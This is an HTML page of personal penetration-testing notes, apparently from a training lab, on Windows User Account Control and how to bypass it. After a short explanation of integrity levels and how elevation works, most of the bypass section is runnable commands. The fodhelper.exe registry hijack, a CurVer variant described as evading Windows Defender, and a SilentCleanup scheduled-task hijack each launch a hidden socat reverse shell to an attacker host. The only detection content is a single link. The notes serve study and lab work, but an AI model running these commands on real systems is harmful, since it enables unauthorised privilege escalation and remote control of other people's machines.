<li><a href="#bypass">Bypass</a><ul>
|
|
<li><a href="#gui">GUI</a><ul>
|
|
<li><a href="#msconfig">msconfig</a></li>
|
|
<li><a href="#azmanmsc">azman.msc</a></li>
|
|
<li><a href="#autoelevate-process">Autoelevate Process</a></li>
|
|
</ul>
|
|
</li>
|
|
<li><a href="#commandline">Commandline</a><ul>
|
|
<li><a href="#fodhelperexe">Fodhelper.exe</a></li>
|
|
</ul>
|
|
</li>
|
|
<li><a href="#scheduled-tasks">Scheduled Tasks</a></li>
|
|
<li><a href="#automated-bypass">Automated Bypass</a></li>
|
|
</ul>
|
|
</li>
|
|
<li><a href="#detection">Detection</a></li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
</div>
|
|
<h1 id="user-account-control">User Account Control</h1>
|
|
<ul>
|
|
<li>Change permissions of a process or its resources</li>
|
|
<li>Mandatory Integrity Control (MIC)</li>
|
|
<li>Feature of MAC, assigns integrity level on permissions<ul>
|
|
<li>Low</li>
|
|
<li>Medium</li>
|
|
<li>High</li>
|
|
<li>System</li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
<h2 id="login-tokens">Login Tokens</h2>
|
|
<ul>
|
|
<li>Access tokens are given to users at login<ul>
|
|
<li><strong>Non Administrator Token</strong>, integrity level low</li>
|
|
<li><strong>Filtered Token</strong>, stripped administrative permission, integrity level medium</li>
|
|
<li><strong>Elevated Token</strong>, elevates to integrity level high</li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
<h2 id="user-account-control-settings">User Account Control Settings</h2>
|
|
<ul>
|
|
<li><strong>Always notify</strong></li>
|
|
<li><strong>Notify me only when programs try to make changes to my computer</strong>, shows UAC dialogue</li>
|
|
<li><strong>Notify me only when programs try to make changes to my computer (do not dim my desktop)</strong></li>
|
|
<li><strong>Never notify</strong>, never show UAC dialogue</li>
|
|
</ul>
|
|
<h2 id="how-uac-works">How UAC Works</h2>
|
|
<p>Application Information Service, a.k.a Appinfo</p>
|
|
<ul>
|
|
<li>User requests elevated permissions</li>
|
|
<li><code>ShellExecute</code> API call is made via <code>runas.exe</code></li>
|
|
<li>Request to Appinfo</li>
|
|
<li>Application manifest is checked if AutoElevation is set to on</li>
|
|
<li>Appinfo runs <code>consent.exe</code>, dialogue opens up</li>
|
|
<li>User clicks yes, token is checked. PPID of the newly created porcess will be pointed to the shell from which the request originates, while the login token is elevated. Otherwise it is denied</li>
|
|
</ul>
|
|
<h2 id="bypass">Bypass</h2>
|
|
<ul>
|
|
<li>UAC is seen as a convenience function, not a security function</li>
|
|
<li><code>Mandatory Label</code> is shown via <code>whoami /groups</code></li>
|
|
</ul>
|
|
<h3 id="gui">GUI</h3>
|
|
<h4 id="msconfig">msconfig</h4>
|
|
<ul>
|
|
<li>Open <code>msconfig</code>, always got integrity level high via auto elevation</li>
|
|
<li>On Tab <code>Tools</code> choose <code>Command Prompt</code> and press <code>Launch</code> to get an elevated <code>cmd.exe</code></li>
|
|
</ul>
|
|
<h4 id="azmanmsc">azman.msc</h4>
|
|
<ul>
|
|
<li>Open <code>azman.msc</code> --> <code>Help</code> --> <code>Help Topics</code></li>
|
|
<li>Right click help article --> <code>view source</code></li>
|
|
<li><code>Open</code> --> <code>File</code>, select <code>All Files</code></li>
|
|
<li>Dialogue opens up, go to <code>C:\Windows\System32\cmd.exe</code> and right click on it to open </li>
|
|
</ul>
|
|
<h4 id="autoelevate-process">Autoelevate Process</h4>
|
|
<ul>
|
|
<li>Binary must be signed</li>
|
|
<li>
|
|
<p>Must be in a trusted dir like <code>Program Files</code> or <code>Windows</code></p>
|
|
</li>
|
|
<li>
|
|
<p>Additionaly, portable executables need <code>autoelevate</code> in the manifest. Check via</p>
|
|
</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>sigcheck64.exe -m <portable_executable.exe>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li><code>mmc.exe</code> autoelevates depending on user request for msc-snapin</li>
|
|
<li>Most <code>*.msc</code>s, <code>spinstall.exe</code>, <code>pkgmgr.exe</code> as well as <a href="https://docs.microsoft.com/en-us/windows/win32/com/the-com-elevation-moniker">COM objects autoelevate</a></li>
|
|
</ul>
|
|
<h3 id="commandline">Commandline</h3>
|
|
<h4 id="fodhelperexe">Fodhelper.exe</h4>
|
|
<ul>
|
|
<li>Default applications are stored in <code>HKEY_LOCAL_MACHINE\Software\Classes</code> which is superseded by the current user profile <code>HKEY_CURRENT_USER\Software\Classes</code></li>
|
|
<li><code>ms-settings</code> ProgID is searched for by <code>fodhelper.exe</code>, this setting overrides system defaults of which executable opens the filetype</li>
|
|
<li>
|
|
<p>The subprocess of <code>fodhelper.exe</code> inherits intergrity level high</p>
|
|
</li>
|
|
<li>
|
|
<p>Open reverse shell on attacker and </p>
|
|
</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>whoami
|
|
net user <user> <span class="p">|</span> find <span class="s2">"Local Group"</span>
|
|
whoami /groups <span class="p">|</span> find <span class="s2">"Label"</span>
|
|
<span class="nb">set</span> <span class="nv">REG_KEY</span><span class="o">=</span>HKCU<span class="se">\S</span>oftware<span class="se">\C</span>lasses<span class="se">\m</span>s-settings<span class="se">\S</span>hell<span class="se">\O</span>pen<span class="se">\c</span>ommand
|
|
<span class="nb">set</span> <span class="nv">CMD</span><span class="o">=</span><span class="s2">"powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:</span><span class="nv">$TARGET_IP</span><span class="s2">:4444 EXEC:cmd.exe,pipes"</span>
|
|
reg add %REG_KEY% /v <span class="s2">"DelegateExecute"</span> /d <span class="s2">""</span> /f
|
|
reg add %REG_KEY% /d %CMD% /f <span class="p">&</span> fodhelper.exe
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>Clean up via </li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>reg delete HKCU<span class="se">\S</span>oftware<span class="se">\C</span>lasses<span class="se">\m</span>s-settings<span class="se">\ </span>/f
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>When Windows Defender is enabled use <a href="https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses">v3d3d's improvement for bypassing Windows Defender</a></li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="nv">$program</span> <span class="o">=</span> <span class="s2">"powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:</span><span class="nv">$TARGET_IP</span><span class="s2">:4445 EXEC:cmd.exe,pipes"</span>
|
|
|
|
New-Item <span class="s2">"HKCU:\Software\Classes\.pwn\Shell\Open\command"</span> -Force Set-ItemProperty <span class="s2">"HKCU:\Software\Classes\.pwn\Shell\Open\command"</span> -Name <span class="s2">"(default)"</span> -Value <span class="nv">$program</span> -Force
|
|
|
|
New-Item -Path <span class="s2">"HKCU:\Software\Classes\ms-settings\CurVer"</span> -Force
|
|
Set-ItemProperty <span class="s2">"HKCU:\Software\Classes\ms-settings\CurVer"</span> -Name <span class="s2">"(default)"</span> -value <span class="s2">".pwn"</span> -Force
|
|
|
|
Start-Process <span class="s2">"C:\Windows\System32\fodhelper.exe"</span> -WindowStyle Hidden
|
|
|
|
<span class="nb">set</span> <span class="nv">CMD</span><span class="o">=</span><span class="s2">"powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:</span><span class="nv">$TARGET_IP</span><span class="s2">:4445 EXEC:cmd.exe,pipes"</span>
|
|
reg add <span class="s2">"HKCU\Software\Classes\.thm\Shell\Open\command"</span> /d %CMD% /f
|
|
reg add <span class="s2">"HKCU\Software\Classes\ms-settings\CurVer"</span> /d <span class="s2">".thm"</span> /f
|
|
fodhelper.exe
|
|
|
|
reg delete <span class="s2">"HKCU\Software\Classes\.thm\" /f</span>
|
|
<span class="s2">reg delete "</span>HKCU<span class="se">\S</span>oftware<span class="se">\C</span>lasses<span class="se">\m</span>s-settings<span class="se">\"</span> /f
|
|
</code></pre></div>
|
|
|
|
<h3 id="scheduled-tasks">Scheduled Tasks</h3>
|
|
<ul>
|
|
<li>UAC will not be triggered on scheduled tasks</li>
|
|
<li>DiskCleanup calls <code>%windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%</code></li>
|
|
<li>Set <code>%windir%</code> to a reverse shell via</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code>reg add <span class="s2">"HKCU\Environment"</span> /v <span class="s2">"windir"</span> /d <span class="s2">"cmd.exe /c C:\tools\socat\socat.exe TCP:</span><span class="nv">$TARGET_IP</span><span class="s2">:4711 EXEC:cmd.exe,pipes &REM "</span> /f
|
|
schtasks /run /tn <span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\D</span>iskCleanup<span class="se">\S</span>ilentCleanup /I
|
|
reg delete <span class="s2">"HKCU\Environment"</span> /v <span class="s2">"windir"</span> /f
|
|
</code></pre></div>
|
|
|
|
<h3 id="automated-bypass">Automated Bypass</h3>
|
|
<ul>
|
|
<li><a href="https://github.com/hfiref0x/UACME.git">hfiref0x's automated bypass named UCAME</a></li>
|
|
</ul>
|
|
<h2 id="detection">Detection</h2>
|
|
<ul>
|
|
<li>https://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/</li>
|
|
</ul>
|
|
</span>
|
|
</div>
|
|
</div>
|
|
<div id="footer">
|
|
|
|
<p></p>
|
|
<center>
|
|
© Stefan Friese
|
|
</center>
|
|
|
|
</div>
|
|
|
|
<script>
|
|
function linkClick(obj) {
|
|
if (obj.open) {
|
|
//console.log('open');
|
|
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
sessionStorage.setItem(obj.id,"open");
|
|
console.log(obj.id);
|
|
} else {
|
|
//console.log('closed');
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
}
|
|
|
|
let _keys = Object.keys(sessionStorage);
|
|
if (_keys) {
|
|
for ( let i = 0; i < _keys.length; i++ ) {
|
|
document.getElementById(_keys[i])['open'] = 'open';
|
|
}
|
|
}
|
|
</script>
|
|
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
|
|
<script type="text/x-mathjax-config">
|
|
MathJax.Hub.Config({
|
|
config: ["MMLorHTML.js"],
|
|
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
|
|
extensions: ["MathMenu.js", "MathZoom.js"]
|
|
});
|
|
</script>
|
|
</body>
|
|
</html> |